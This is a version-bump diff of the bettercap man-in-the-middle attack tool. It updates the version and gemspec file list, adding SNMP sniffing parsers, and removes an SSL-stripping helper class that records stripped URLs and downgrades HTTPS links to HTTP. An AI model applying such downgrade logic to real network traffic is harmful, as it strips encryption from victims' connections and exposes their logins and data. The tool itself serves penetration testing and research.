 module BetterCap
   # Current version of bettercap.
-  VERSION = '1.3.7'
+  VERSION = '1.3.8'
   # Program banner.
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.3.7
+  version: 1.3.8
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2016-02-08 00:00:00.000000000 Z
+date: 2016-02-13 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -143,6 +143,7 @@ files:
 - lib/bettercap/network/protos/dhcp.rb
 - lib/bettercap/network/protos/mysql.rb
 - lib/bettercap/network/protos/ntlm.rb
+- lib/bettercap/network/protos/snmp.rb
 - lib/bettercap/network/servers/dnsd.rb
 - lib/bettercap/network/servers/httpd.rb
 - lib/bettercap/network/services
@@ -159,7 +160,6 @@ files:
 - lib/bettercap/proxy/sslstrip/cookiemonitor.rb
 - lib/bettercap/proxy/sslstrip/lock.ico
 - lib/bettercap/proxy/sslstrip/strip.rb
-- lib/bettercap/proxy/sslstrip/urlmonitor.rb
 - lib/bettercap/proxy/stream_logger.rb
 - lib/bettercap/proxy/streamer.rb
 - lib/bettercap/proxy/thread_pool.rb
@@ -182,6 +182,7 @@ files:
 - lib/bettercap/sniffer/parsers/post.rb
 - lib/bettercap/sniffer/parsers/redis.rb
 - lib/bettercap/sniffer/parsers/rlogin.rb
+- lib/bettercap/sniffer/parsers/snmp.rb
 - lib/bettercap/sniffer/parsers/snpp.rb
 - lib/bettercap/sniffer/parsers/url.rb
 - lib/bettercap/sniffer/parsers/whatsapp.rb

data/lib/bettercap/proxy/sslstrip/urlmonitor.rb

@@ -1,53 +0,0 @@
-# encoding: UTF-8
-=begin
-
-BETTERCAP
-
-Author : Simone 'evilsocket' Margaritelli
-Email  : evilsocket@gmail.com
-Blog   : http://www.evilsocket.net/
-
-This project is released under the GPL 3 license.
-
-=end
-
-module BetterCap
-module Proxy
-module SSLStrip
-
-# Class to handle a list of ( client, url ) objects.
-class URLMonitor
-  # Create an instance of this object.
-  def initialize
-    @urls = []
-  end
-
-  # Return true if the object (client, url) is found inside this list.
-  def was_stripped?( client, url )
-    @urls.include?([client, url])
-  end
-
-  # Add the object (client, url) to this list.
-  def add!( client, url )
-    unless was_stripped?(client, url)
-      @urls << [client, url]
-    end
-  end
-
-  # Return a normalized version of +url+.
-  def normalize( url )
-    url = if url.include?('://') then url else "https://#{url}" end
-    url = if url.end_with?('/') then url else "#{url}/" end
-    url
-  end
-
-  # Downgrade +url+ from HTTPS to HTTP.
-  # Will take care of HSTS bypass urls in a near future.
-  def downgrade( url )
-    url.gsub( 'https://', 'http://' )
-  end
-end
-
-end
-end
-end